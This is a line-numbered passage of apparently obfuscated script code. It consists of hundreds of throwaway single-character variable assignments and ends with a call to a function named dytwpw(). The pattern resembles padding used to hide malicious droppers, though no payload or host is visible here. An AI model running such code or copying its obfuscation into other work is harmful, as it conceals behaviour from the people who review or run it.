744 | buwrjbxxg = "j"; | |
745 | buwrjbxxg = "M"; | |
746 | buwrjbxxg = "N"; | |
747 | buwrjbxxg = "h"; | |
748 | buwrjbxxg = "H"; | |
749 | buwrjbxxg = "n"; | |
750 | jotussp = "q"; | |
751 | jotussp = "f"; | |
752 | jotussp = "A"; | |
753 | jotussp = "M"; | |
754 | jotussp = "F"; | |
755 | jotussp = "Z"; | |
756 | jotussp = "T"; | |
757 | jotussp = "B"; | |
758 | jotussp = "W"; | |
759 | jotussp = "U"; | |
760 | jotussp = "S"; | |
761 | jotussp = "X"; | |
762 | jotussp = "f"; | |
763 | jotussp = "H"; | |
764 | jotussp = "X"; | |
765 | jotussp = "Q"; | |
766 | jotussp = "A"; | |
767 | jotussp = "2"; | |
768 | ecvpwl = "X"; | |
769 | ecvpwl = "x"; | |
770 | ecvpwl = "X"; | |
771 | ecvpwl = "x"; | |
772 | ecvpwl = "r"; | |
773 | ecvpwl = "D"; | |
774 | ecvpwl = "v"; | |
775 | ecvpwl = "i"; | |
776 | ecvpwl = "D"; | |
777 | ecvpwl = "y"; | |
778 | ecvpwl = "w"; | |
779 | ecvpwl = "i"; | |
780 | ecvpwl = "r"; | |
781 | ecvpwl = "r"; | |
782 | ecvpwl = "k"; | |
783 | ecvpwl = "A"; | |
784 | ecvpwl = "k"; | |
785 | ecvpwl = "Z"; | |
786 | ecvpwl = "W"; | |
787 | ecvpwl = "Y"; | |
788 | ecvpwl = "X"; | |
789 | ecvpwl = "S"; | |
790 | ecvpwl = "x"; | |
791 | ecvpwl = "K"; | |
792 | ecvpwl = "x"; | |
793 | ttoym = "c"; | |
794 | ttoym = "a"; | |
795 | ttoym = "F"; | |
796 | ttoym = "J"; | |
797 | ttoym = "y"; | |
798 | ttoym = "z"; | |
799 | ttoym = "r"; | |
800 | ttoym = "A"; | |
801 | ttoym = "T"; | |
802 | ttoym = "U"; | |
803 | ttoym = "B"; | |
804 | ttoym = "a"; | |
805 | ttoym = "t"; | |
806 | ttoym = "B"; | |
807 | ttoym = "d"; | |
808 | hqiaxx = "d"; | |
809 | hqiaxx = "q"; | |
810 | hqiaxx = "I"; | |
811 | hqiaxx = "w"; | |
812 | hqiaxx = "a"; | |
813 | hqiaxx = "a"; | |
814 | hqiaxx = "k"; | |
815 | hqiaxx = "K"; | |
816 | hqiaxx = "H"; | |
817 | hqiaxx = "r"; | |
818 | hqiaxx = "I"; | |
819 | hqiaxx = "j"; | |
820 | hqiaxx = "B"; | |
821 | hqiaxx = "j"; | |
822 | hqiaxx = "J"; | |
823 | hqiaxx = "T"; | |
824 | hqiaxx = "B"; | |
825 | hqiaxx = "W"; | |
826 | hqiaxx = "g"; | |
827 | hqiaxx = "N"; | |
828 | hqiaxx = "Q"; | |
829 | hqiaxx = "k"; | |
830 | hqiaxx = "o"; | |
831 | hqiaxx = "D"; | |
832 | hqiaxx = "i"; | |
833 | hqiaxx = "v"; | |
834 | hqiaxx = "d"; | |
835 | hqiaxx = "V"; | |
836 | hqiaxx = "Q"; | |
837 | hqiaxx = "M"; | |
838 | hqiaxx = "o"; | |
839 | hqiaxx = "w"; | |
840 | hqiaxx = "x"; | |
841 | hqiaxx = "O"; | |
842 | hqiaxx = "m"; | |
843 | hqiaxx = "A"; | |
844 | hqiaxx = "U"; | |
845 | hqiaxx = "j"; | |
846 | hqiaxx = "Q"; | |
847 | jeotg = "e"; | |
848 | jeotg = "z"; | |
849 | jeotg = "E"; | |
850 | jeotg = "W"; | |
851 | jeotg = "Z"; | |
852 | jeotg = "m"; | |
853 | jeotg = "Y"; | |
854 | jeotg = "0"; | |
855 | twzpyjqsf = "A"; | |
856 | twzpyjqsf = "Q"; | |
857 | twzpyjqsf = "K"; | |
858 | twzpyjqsf = "V"; | |
859 | twzpyjqsf = "S"; | |
860 | twzpyjqsf = "c"; | |
861 | twzpyjqsf = "p"; | |
862 | twzpyjqsf = "L"; | |
863 | twzpyjqsf = "w"; | |
864 | exzynrbj = "v"; | |
865 | exzynrbj = "L"; | |
866 | exzynrbj = "m"; | |
867 | exzynrbj = "p"; | |
868 | exzynrbj = "A"; | |
869 | exzynrbj = "c"; | |
870 | exzynrbj = "W"; | |
871 | exzynrbj = "Q"; | |
872 | exzynrbj = "a"; | |
873 | exzynrbj = "C"; | |
874 | exzynrbj = "o"; | |
875 | exzynrbj = "k"; | |
876 | exzynrbj = "M"; | |
877 | exzynrbj = "t"; | |
878 | exzynrbj = "Q"; | |
879 | exzynrbj = "F"; | |
880 | exzynrbj = "E"; | |
881 | exzynrbj = "y"; | |
882 | exzynrbj = "s"; | |
883 | exzynrbj = "k"; | |
884 | exzynrbj = "i"; | |
885 | exzynrbj = "W"; | |
886 | exzynrbj = "y"; | |
887 | exzynrbj = "z"; | |
888 | exzynrbj = "z"; | |
889 | exzynrbj = "L"; | |
890 | exzynrbj = "t"; | |
891 | exzynrbj = "u"; | |
892 | exzynrbj = "I"; | |
893 | exzynrbj = "d"; | |
894 | exzynrbj = "l"; | |
895 | exzynrbj = "H"; | |
896 | exzynrbj = "E"; | |
897 | exzynrbj = "q"; | |
898 | exzynrbj = "s"; | |
899 | exzynrbj = "t"; | |
900 | exzynrbj = "q"; | |
901 | exzynrbj = "T"; | |
902 | exzynrbj = "e"; | |
903 | exzynrbj = "E"; | |
904 | exzynrbj = "A"; | |
905 | exzynrbj = "B"; | |
906 | exzynrbj = "k"; | |
907 | exzynrbj = "C"; | |
908 | whcjj = "n"; | |
909 | whcjj = "R"; | |
910 | whcjj = "i"; | |
911 | whcjj = "c"; | |
912 | whcjj = "s"; | |
913 | whcjj = "n"; | |
914 | whcjj = "d"; | |
915 | whcjj = "w"; | |
916 | whcjj = "G"; | |
917 | whcjj = "n"; | |
918 | whcjj = "y"; | |
919 | whcjj = "F"; | |
920 | whcjj = "B"; | |
921 | whcjj = "N"; | |
922 | whcjj = "D"; | |
923 | whcjj = "M"; | |
924 | whcjj = "n"; | |
925 | whcjj = "H"; | |
926 | whcjj = "c"; | |
927 | whcjj = "5"; | |
928 | qdxmg = "N"; | |
929 | qdxmg = "u"; | |
930 | qdxmg = "p"; | |
931 | qdxmg = "M"; | |
932 | qdxmg = "u"; | |
933 | qdxmg = "Q"; | |
934 | qdxmg = "z"; | |
935 | qdxmg = "t"; | |
936 | qdxmg = "z"; | |
937 | qdxmg = "z"; | |
938 | qdxmg = "o"; | |
939 | qdxmg = "v"; | |
940 | qdxmg = "w"; | |
941 | qdxmg = "b"; | |
942 | qdxmg = "b"; | |
943 | qdxmg = "F"; | |
944 | qdxmg = "U"; | |
945 | qdxmg = "J"; | |
946 | qdxmg = "k"; | |
947 | qdxmg = "X"; | |
948 | qdxmg = "O"; | |
949 | qdxmg = "V"; | |
950 | qdxmg = "O"; | |
951 | qdxmg = "x"; | |
952 | qdxmg = "i"; | |
953 | qdxmg = "k"; | |
954 | qdxmg = "K"; | |
955 | qdxmg = "A"; | |
956 | qdxmg = "k"; | |
957 | qdxmg = "N"; | |
958 | qdxmg = "z"; | |
959 | qdxmg = "M"; | |
960 | qdxmg = "B"; | |
961 | qdxmg = "V"; | |
962 | qdxmg = "M"; | |
963 | qdxmg = "S"; | |
964 | qdxmg = "V"; | |
965 | qdxmg = "I"; | |
966 | qdxmg = "y"; | |
967 | qdxmg = "e"; | |
968 | qdxmg = "w"; | |
969 | qdxmg = "Q"; | |
970 | qdxmg = "r"; | |
971 | qdxmg = "4"; | |
972 | iunzzl = "Y"; | |
973 | iunzzl = "n"; | |
974 | iunzzl = "h"; | |
975 | iunzzl = "A"; | |
976 | iunzzl = "H"; | |
977 | iunzzl = "x"; | |
978 | iunzzl = "u"; | |
979 | iunzzl = "U"; | |
980 | iunzzl = "y"; | |
981 | iunzzl = "d"; | |
982 | iunzzl = "q"; | |
983 | iunzzl = "k"; | |
984 | iunzzl = "T"; | |
985 | iunzzl = "t"; | |
986 | iunzzl = "Z"; | |
987 | iunzzl = "O"; | |
988 | iunzzl = "n"; | |
989 | iunzzl = "b"; | |
990 | iunzzl = "l"; | |
991 | iunzzl = "G"; | |
992 | iunzzl = "z"; | |
993 | iunzzl = "Q"; | |
994 | iunzzl = "r"; | |
995 | iunzzl = "I"; | |
996 | iunzzl = "e"; | |
997 | iunzzl = "P"; | |
998 | eubcpqbja = "c"; | |
999 | eubcpqbja = "D"; | |
1000 | eubcpqbja = "p"; | |
1001 | eubcpqbja = "l"; | |
1002 | eubcpqbja = "g"; | |
1003 | eubcpqbja = "P"; | |
1004 | eubcpqbja = "b"; | |
1005 | eubcpqbja = "t"; | |
1006 | eubcpqbja = "j"; | |
1007 | eubcpqbja = "s"; | |
1008 | eubcpqbja = "r"; | |
1009 | eubcpqbja = "y"; | |
1010 | eubcpqbja = "r"; | |
1011 | eubcpqbja = "H"; | |
1012 | eubcpqbja = "t"; | |
1013 | eubcpqbja = "r"; | |
1014 | eubcpqbja = "g"; | |
1015 | eubcpqbja = "E"; | |
1016 | nxhamey = "a"; | |
1017 | nxhamey = "k"; | |
1018 | nxhamey = "K"; | |
1019 | nxhamey = "R"; | |
1020 | nxhamey = "F"; | |
1021 | nxhamey = "T"; | |
1022 | nxhamey = "h"; | |
1023 | nxhamey = "m"; | |
1024 | nxhamey = "h"; | |
1025 | nxhamey = "Z"; | |
1026 | nxhamey = "i"; | |
1027 | nxhamey = "B"; | |
1028 | nxhamey = "U"; | |
1029 | nxhamey = "g"; | |
1030 | nxhamey = "c"; | |
1031 | nxhamey = "U"; | |
1032 | nxhamey = "d"; | |
1033 | nxhamey = "L"; | |
1034 | nxhamey = "c"; | |
1035 | nxhamey = "r"; | |
1036 | nxhamey = "c"; | |
1037 | qeqpl = "a"; | |
1038 | qeqpl = "B"; | |
1039 | qeqpl = "Z"; | |
1040 | qeqpl = "z"; | |
1041 | qeqpl = "T"; | |
1042 | qeqpl = "a"; | |
1043 | qeqpl = "N"; | |
1044 | qeqpl = "b"; | |
1045 | qeqpl = "j"; | |
1046 | qeqpl = "N"; | |
1047 | qeqpl = "J"; | |
1048 | qeqpl = "y"; | |
1049 | qeqpl = "l"; | |
1050 | qeqpl = "v"; | |
1051 | qeqpl = "l"; | |
1052 | qeqpl = "R"; | |
1053 | qeqpl = "Q"; | |
1054 | qeqpl = "h"; | |
1055 | qeqpl = "A"; | |
1056 | qeqpl = "K"; | |
1057 | qeqpl = "F"; | |
1058 | qeqpl = "O"; | |
1059 | qeqpl = "h"; | |
1060 | qeqpl = "K"; | |
1061 | qeqpl = "T"; | |
1062 | qeqpl = "g"; | |
1063 | qeqpl = "R"; | |
1064 | qeqpl = "c"; | |
1065 | qeqpl = "q"; | |
1066 | qeqpl = "W"; | |
1067 | qeqpl = "d"; | |
1068 | qeqpl = "F"; | |
1069 | qeqpl = "Z"; | |
1070 | qeqpl = "G"; | |
1071 | qeqpl = "E"; | |
1072 | qeqpl = "l"; | |
1073 | qeqpl = "t"; | |
1074 | cicbpks = "F"; | |
1075 | cicbpks = "A"; | |
1076 | cicbpks = "Q"; | |
1077 | cicbpks = "l"; | |
1078 | cicbpks = "D"; | |
1079 | cicbpks = "h"; | |
1080 | cicbpks = "h"; | |
1081 | cicbpks = "o"; | |
1082 | cicbpks = "N"; | |
1083 | cicbpks = "e"; | |
1084 | cicbpks = "H"; | |
1085 | cicbpks = "O"; | |
1086 | cicbpks = "A"; | |
1087 | cicbpks = "K"; | |
1088 | cicbpks = "Y"; | |
1089 | xgbbwanvq = "l"; | |
1090 | xgbbwanvq = "E"; | |
1091 | xgbbwanvq = "z"; | |
1092 | xgbbwanvq = "Z"; | |
1093 | xgbbwanvq = "x"; | |
1094 | xgbbwanvq = "d"; | |
1095 | xgbbwanvq = "x"; | |
1096 | xgbbwanvq = "U"; | |
1097 | xgbbwanvq = "R"; | |
1098 | xgbbwanvq = "B"; | |
1099 | xgbbwanvq = "V"; | |
1100 | xgbbwanvq = "z"; | |
1101 | xgbbwanvq = "T"; | |
1102 | xgbbwanvq = "t"; | |
1103 | xgbbwanvq = "C"; | |
1104 | xgbbwanvq = "V"; | |
1105 | xgbbwanvq = "M"; | |
1106 | xgbbwanvq = "W"; | |
1107 | xgbbwanvq = "s"; | |
1108 | xgbbwanvq = "X"; | |
1109 | xgbbwanvq = "f"; | |
1110 | xgbbwanvq = "E"; | |
1111 | xgbbwanvq = "L"; | |
1112 | xgbbwanvq = "R"; | |
1113 | xgbbwanvq = "I"; | |
1114 | xgbbwanvq = "S"; | |
1115 | xgbbwanvq = "X"; | |
1116 | xgbbwanvq = "K"; | |
1117 | eszbvadg = "N"; | |
1118 | eszbvadg = "R"; | |
1119 | eszbvadg = "s"; | |
1120 | eszbvadg = "d"; | |
1121 | eszbvadg = "l"; | |
1122 | eszbvadg = "R"; | |
1123 | eszbvadg = "N"; | |
1124 | eszbvadg = "C"; | |
1125 | eszbvadg = "d"; | |
1126 | eszbvadg = "p"; | |
1127 | eszbvadg = "V"; | |
1128 | eszbvadg = "t"; | |
1129 | eszbvadg = "M"; | |
1130 | eszbvadg = "P"; | |
1131 | eszbvadg = "X"; | |
1132 | eszbvadg = "Q"; | |
1133 | eszbvadg = "q"; | |
1134 | eszbvadg = "x"; | |
1135 | eszbvadg = "U"; | |
1136 | eszbvadg = "\\"; | |
1137 | hqzpgx = "q"; | |
1138 | hqzpgx = "i"; | |
1139 | hqzpgx = "R"; | |
1140 | hqzpgx = "y"; | |
1141 | hqzpgx = "i"; | |
1142 | ikxpiy = "A"; | |
1143 | ikxpiy = "Y"; | |
1144 | ikxpiy = "t"; | |
1145 | ikxpiy = "D"; | |
1146 | ikxpiy = "B"; | |
1147 | ikxpiy = "r"; | |
1148 | ikxpiy = "O"; | |
1149 | ikxpiy = "M"; | |
1150 | ikxpiy = "Y"; | |
1151 | ikxpiy = "i"; | |
1152 | ikxpiy = "B"; | |
1153 | ikxpiy = "o"; | |
1154 | ikxpiy = "y"; | |
1155 | ikxpiy = "n"; | |
1156 | ikxpiy = "T"; | |
1157 | ikxpiy = "O"; | |
1158 | ikxpiy = "A"; | |
1159 | ikxpiy = "G"; | |
1160 | ikxpiy = "Y"; | |
1161 | ikxpiy = "W"; | |
1162 | ikxpiy = "x"; | |
1163 | ikxpiy = "e"; | |
1164 | ikxpiy = "W"; | |
1165 | ikxpiy = "a"; | |
1166 | ikxpiy = "P"; | |
1167 | ikxpiy = "I"; | |
1168 | ikxpiy = "w"; | |
1169 | ikxpiy = "9"; | |
1170 | ibflqy = "f"; | |
1171 | ibflqy = "E"; | |
1172 | ibflqy = "c"; | |
1173 | ibflqy = "g"; | |
1174 | ibflqy = "n"; | |
1175 | ibflqy = "Q"; | |
1176 | ibflqy = "B"; | |
1177 | ibflqy = "l"; | |
1178 | ibflqy = "K"; | |
1179 | ibflqy = "R"; | |
1180 | ibflqy = "F"; | |
1181 | ibflqy = "S"; | |
1182 | ibflqy = "J"; | |
1183 | ibflqy = "A"; | |
1184 | ibflqy = "P"; | |
1185 | ibflqy = "H"; | |
1186 | ibflqy = "G"; | |
1187 | ibflqy = "Y"; | |
1188 | ibflqy = "F"; | |
1189 | ibflqy = "O"; | |
1190 | gllztszhx = "d"; | |
1191 | gllztszhx = "y"; | |
1192 | gllztszhx = "W"; | |
1193 | gllztszhx = "t"; | |
1194 | gllztszhx = "a"; | |
1195 | gllztszhx = "L"; | |
1196 | gllztszhx = "C"; | |
1197 | gllztszhx = "E"; | |
1198 | gllztszhx = "M"; | |
1199 | gllztszhx = "y"; | |
1200 | gllztszhx = "s"; | |
1201 | gllztszhx = "q"; | |
1202 | gllztszhx = "Y"; | |
1203 | gllztszhx = "D"; | |
1204 | gllztszhx = "U"; | |
1205 | gllztszhx = "e"; | |
1206 | gllztszhx = "A"; | |
1207 | gllztszhx = "Q"; | |
1208 | gllztszhx = "y"; | |
1209 | gllztszhx = "Y"; | |
1210 | gllztszhx = "y"; | |
1211 | gllztszhx = "Z"; | |
1212 | gllztszhx = "p"; | |
1213 | gllztszhx = "L"; | |
1214 | gllztszhx = "t"; | |
1215 | gllztszhx = "M"; | |
1216 | gllztszhx = "d"; | |
1217 | gllztszhx = "q"; | |
1218 | higfum = "O"; | |
1219 | higfum = "F"; | |
1220 | higfum = "S"; | |
1221 | higfum = "B"; | |
1222 | higfum = "g"; | |
1223 | higfum = "p"; | |
1224 | higfum = "f"; | |
1225 | higfum = "q"; | |
1226 | higfum = "t"; | |
1227 | higfum = "y"; | |
1228 | higfum = "w"; | |
1229 | higfum = "b"; | |
1230 | higfum = "k"; | |
1231 | higfum = "j"; | |
1232 | higfum = "b"; | |
1233 | kubdcinf = "w"; | |
1234 | kubdcinf = "p"; | |
1235 | kubdcinf = "T"; | |
1236 | kubdcinf = "U"; | |
1237 | kubdcinf = "F"; | |
1238 | kubdcinf = "q"; | |
1239 | kubdcinf = "w"; | |
1240 | kubdcinf = "L"; | |
1241 | kubdcinf = "P"; | |
1242 | kubdcinf = "d"; | |
1243 | kubdcinf = "T"; | |
1244 | kubdcinf = "f"; | |
1245 | kubdcinf = "B"; | |
1246 | kubdcinf = "q"; | |
1247 | kubdcinf = "z"; | |
1248 | kubdcinf = "Q"; | |
1249 | kubdcinf = "j"; | |
1250 | kubdcinf = "D"; | |
1251 | kubdcinf = "a"; | |
1252 | kubdcinf = "b"; | |
1253 | kubdcinf = "z"; | |
1254 | kubdcinf = "u"; | |
1255 | kubdcinf = "m"; | |
1256 | kubdcinf = "3"; | |
1257 | vnfil = "R"; | |
1258 | vnfil = "m"; | |
1259 | vnfil = "V"; | |
1260 | vnfil = "q"; | |
1261 | vnfil = "i"; | |
1262 | vnfil = "k"; | |
1263 | vnfil = "V"; | |
1264 | vnfil = "E"; | |
1265 | vnfil = "w"; | |
1266 | vnfil = "K"; | |
1267 | vnfil = "s"; | |
1268 | vnfil = "p"; | |
1269 | vnfil = "d"; | |
1270 | vnfil = "h"; | |
1271 | vnfil = "X"; | |
1272 | vnfil = "F"; | |
1273 | vnfil = "f"; | |
1274 | vnfil = "x"; | |
1275 | vnfil = "n"; | |
1276 | vnfil = "&"; | |
1277 | lnnurw = "X"; | |
1278 | lnnurw = "T"; | |
1279 | lnnurw = "u"; | |
1280 | lnnurw = "V"; | |
1281 | lnnurw = "Y"; | |
1282 | lnnurw = "D"; | |
1283 | lnnurw = "H"; | |
1284 | lnnurw = "x"; | |
1285 | lnnurw = "k"; | |
1286 | lnnurw = "r"; | |
1287 | lnnurw = "i"; | |
1288 | lnnurw = "x"; | |
1289 | lnnurw = "P"; | |
1290 | lnnurw = "b"; | |
1291 | lnnurw = "U"; | |
1292 | lnnurw = "z"; | |
1293 | lnnurw = "x"; | |
1294 | lnnurw = "K"; | |
1295 | lnnurw = "Y"; | |
1296 | lnnurw = "f"; | |
1297 | lnnurw = "i"; | |
1298 | lnnurw = "V"; | |
1299 | lnnurw = "A"; | |
1300 | lnnurw = "C"; | |
1301 | lnnurw = "M"; | |
1302 | lnnurw = "d"; | |
1303 | lnnurw = "y"; | |
1304 | lnnurw = "I"; | |
1305 | lnnurw = "r"; | |
1306 | lnnurw = "b"; | |
1307 | lnnurw = "R"; | |
1308 | lnnurw = "u"; | |
1309 | lnnurw = "M"; | |
1310 | lnnurw = "R"; | |
1311 | lnnurw = "X"; | |
1312 | lnnurw = "/"; | |
1313 | cgfjho = "U"; | |
1314 | cgfjho = "E"; | |
1315 | cgfjho = "n"; | |
1316 | cgfjho = "d"; | |
1317 | cgfjho = "v"; | |
1318 | cgfjho = "E"; | |
1319 | cgfjho = "L"; | |
1320 | cgfjho = "l"; | |
1321 | cgfjho = "r"; | |
1322 | cgfjho = "y"; | |
1323 | cgfjho = "n"; | |
1324 | cgfjho = "W"; | |
1325 | cgfjho = "z"; | |
1326 | cgfjho = "D"; | |
1327 | cgfjho = "h"; | |
1328 | cgfjho = "H"; | |
1329 | cgfjho = "w"; | |
1330 | cgfjho = "C"; | |
1331 | cgfjho = "j"; | |
1332 | cgfjho = "W"; | |
1333 | cgfjho = "@"; | |
1334 | egmmn = "E"; | |
1335 | egmmn = "u"; | |
1336 | egmmn = "P"; | |
1337 | egmmn = "j"; | |
1338 | egmmn = "i"; | |
1339 | egmmn = "N"; | |
1340 | egmmn = "Q"; | |
1341 | egmmn = "m"; | |
1342 | egmmn = "o"; | |
1343 | egmmn = "z"; | |
1344 | egmmn = "K"; | |
1345 | egmmn = "J"; | |
1346 | egmmn = "E"; | |
1347 | egmmn = "j"; | |
1348 | egmmn = "q"; | |
1349 | egmmn = "y"; | |
1350 | egmmn = "V"; | |
1351 | egmmn = "."; | |
1352 | wyddszzix = "F"; | |
1353 | wyddszzix = "q"; | |
1354 | wyddszzix = "e"; | |
1355 | wyddszzix = "s"; | |
1356 | wyddszzix = "s"; | |
1357 | wyddszzix = "R"; | |
1358 | wwtxvv = "p"; | |
1359 | qcsesr = "V"; | |
1360 | qcsesr = "I"; | |
1361 | qcsesr = "L"; | |
1362 | yxwxivd = "u"; | |
1363 | yxwxivd = "s"; | |
1364 | yxwxivd = "n"; | |
1365 | yxwxivd = "Q"; | |
1366 | yxwxivd = "v"; | |
1367 | yxwxivd = "e"; | |
1368 | yxwxivd = "n"; | |
1369 | yxwxivd = "u"; | |
1370 | yxwxivd = "f"; | |
1371 | yxwxivd = "t"; | |
1372 | yxwxivd = "E"; | |
1373 | yxwxivd = "H"; | |
1374 | yxwxivd = "O"; | |
1375 | yxwxivd = "o"; | |
1376 | yxwxivd = "w"; | |
1377 | yxwxivd = "L"; | |
1378 | yxwxivd = "t"; | |
1379 | yxwxivd = "B"; | |
1380 | yxwxivd = "V"; | |
1381 | yxwxivd = "K"; | |
1382 | yxwxivd = "i"; | |
1383 | yxwxivd = "u"; | |
1384 | yxwxivd = "h"; | |
1385 | yxwxivd = "O"; | |
1386 | yxwxivd = "V"; | |
1387 | yxwxivd = "z"; | |
1388 | yxwxivd = "L"; | |
1389 | yxwxivd = "Z"; | |
1390 | yxwxivd = "C"; | |
1391 | yxwxivd = "H"; | |
1392 | dytwpw ( ); |
|